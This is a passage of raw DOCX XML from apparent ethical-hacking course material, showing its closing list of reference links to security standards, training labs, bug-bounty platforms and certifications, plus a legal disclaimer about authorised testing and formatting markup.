      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rId1is8nhsoqypxo-sc2vrag">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">DVWA — Damn Vulnerable Web Application (GitHub)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdfl3u3due_mfawtg4q1ibi">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">India — Information Technology Act, 2000 (Ministry of Electronics and IT)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdgirzb19phs_wzqslffqbk">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Penetration Testing Execution Standard (PTES)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdgrw0adxj3cxnktjlugbgu">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">HackerOne</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdkbycx3fgtvfblnjwtonof">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Bugcrowd</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdb5i2de-27oxlz1gtrqn7n">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">CompTIA Security+</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdp-qj4cen74ytnzaetlpg_">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">EC-Council — Certified Ethical Hacker (CEH)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIda4zux9jxj772se-ogvfyl">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">OffSec — OSCP</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:left w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:bottom w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:right w:val="single" w:color="1E7B45" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E7B45"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠ Legal disclaimer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">All legal content in this book (IT Act sections, evidentiary notes) is provided for educational purposes only and does not constitute legal advice. For any real engagement, consult a qualified lawyer and your organisation's legal/compliance function. All technical content describes activities that are legal only when performed with explicit written authorisation inside an appropriately scoped and isolated environment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Note on sources used to prepare this book:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> this material was written from established, publicly documented security knowledge and the official syllabus PDF supplied for this course; it was not generated by copying text from any single external source. Where current, version-sensitive facts matter (tool versions, current operator behaviour, UI steps), cross-check against the official documentation linked above, since these details change over time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared for educational and authorised laboratory use.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId8"/>
      <w:footerReference w:type="default" r:id="rId9"/>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4"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9746"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="777777"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
      </w:rPr>
      <w:t xml:space="preserve">Ethical Hacking &amp; Penetration Testing — Study Material</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="777777"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
      </w:rPr>
      <w:t xml:space="preserve">	Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="777777"/>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4"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9746"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="777777"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
      </w:rPr>
      <w:t xml:space="preserve">Ethical Hacking &amp; Penetration Testing — Study Material</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="777777"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
      </w:rPr>
      <w:t xml:space="preserve">	Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="777777"/>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99999"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Ethical Hacking &amp; Penetration Testing — MCA Sem III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abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0" w15:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="460" w:hanging="320"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0" w15:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="460" w:hanging="320"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0" w15:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="460" w:hanging="320"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0" w15:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="460" w:hanging="320"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0" w15:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="460" w:hanging="320"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0" w15:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="460" w:hanging="320"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0" w15:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="460" w:hanging="320"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0" w15:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="460" w:hanging="320"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0" w15:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="460" w:hanging="320"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0" w15:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="460" w:hanging="320"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0" w15:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="460" w:hanging="320"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0" w15:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="46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ynw0xkz_dtbz8gs8z59ls" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov" TargetMode="External"/><Relationship Id="rIdyu_dihvxnogewuwgtabe4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/v3.1/specification-document" TargetMode="External"/><Relationship Id="rIdsq8jcfpd2jicem7uz4evs" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/3.1" TargetMode="External"/><Relationship Id="rIdttelpt6rjv0usnd2xinoq" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackerone.com" TargetMode="External"/><Relationship Id="rIddlm4wtsd7oelisoxsvfyc" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bugcrowd.com" TargetMode="External"/><Relationship Id="rIdn1ad5m29fwdxxrkpjs2vi" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.comptia.org/certifications/security" TargetMode="External"/><Relationship Id="rId-vvujl4ykrrrzunttybyt" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.eccouncil.org/train-certify/certified-ethical-hacker-ceh/" TargetMode="External"/><Relationship Id="rIdxd9z2wqp-watvzamqhzx1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ine.com/certifications/ejpt-certification" TargetMode="External"/><Relationship Id="rIdv2o5hvyoknjionacnukdp" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offsec.com/courses/pen-200/" TargetMode="External"/><Relationship Id="rIdzkd4onrgzrkgtg4murlnc" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-top-ten/" TargetMode="External"/><Relationship Id="rIdmta3i--bqvpvlg57uftzx" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/" TargetMode="External"/><Relationship Id="rIdkwys7cygs8s6_i1qzuoxk" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov" TargetMode="External"/><Relationship Id="rId4hmop03kjfzn_kwefcjnq" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/v3.1/specification-document" TargetMode="External"/><Relationship Id="rIdmumbw71ixj5r9hqmmkenv" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.first.org/cvss/calculator/3.1" TargetMode="External"/><Relationship Id="rIdeikmaixu3pa5yx2vikx5a" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org" TargetMode="External"/><Relationship Id="rIdtol_0f5vgsqcaifbacys_" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org" TargetMode="External"/><Relationship Id="rIdr_vh2co-palq_pcbjxoyd" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/book/man.html" TargetMode="External"/><Relationship Id="rIdswa3bajct5xms6azjwgjq" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.metasploit.com" TargetMode="External"/><Relationship Id="rIdfvnmpvn49bqy5jea7inoj" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/docs/" TargetMode="External"/><Relationship Id="rId6e1npztwm3wnamp4dnyed" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/documentation" TargetMode="External"/><Relationship Id="rIdbwt-ezn-eefscrugageld" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io" TargetMode="External"/><Relationship Id="rId1is8nhsoqypxo-sc2vrag" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/digininja/DVWA" TargetMode="External"/><Relationship Id="rIdfl3u3due_mfawtg4q1ibi" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.meity.gov.in/content/information-technology-act-2000" TargetMode="External"/><Relationship Id="rIdgirzb19phs_wzqslffqbk" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pentest-standard.org" TargetMode="External"/><Relationship Id="rIdgrw0adxj3cxnktjlugbgu" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackerone.com" TargetMode="External"/><Relationship Id="rIdkbycx3fgtvfblnjwtonof" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bugcrowd.com" TargetMode="External"/><Relationship Id="rIdb5i2de-27oxlz1gtrqn7n" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.comptia.org/certifications/security" TargetMode="External"/><Relationship Id="rIdp-qj4cen74ytnzaetlpg_" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.eccouncil.org/train-certify/certified-ethical-hacker-ceh/" TargetMode="External"/><Relationship Id="rIda4zux9jxj772se-ogvfyl" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offsec.com/courses/pen-200/" TargetMode="External"/><Relationship Id="rId3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2026-10-26T10:21:16.784Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-26T10:21:16.784Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>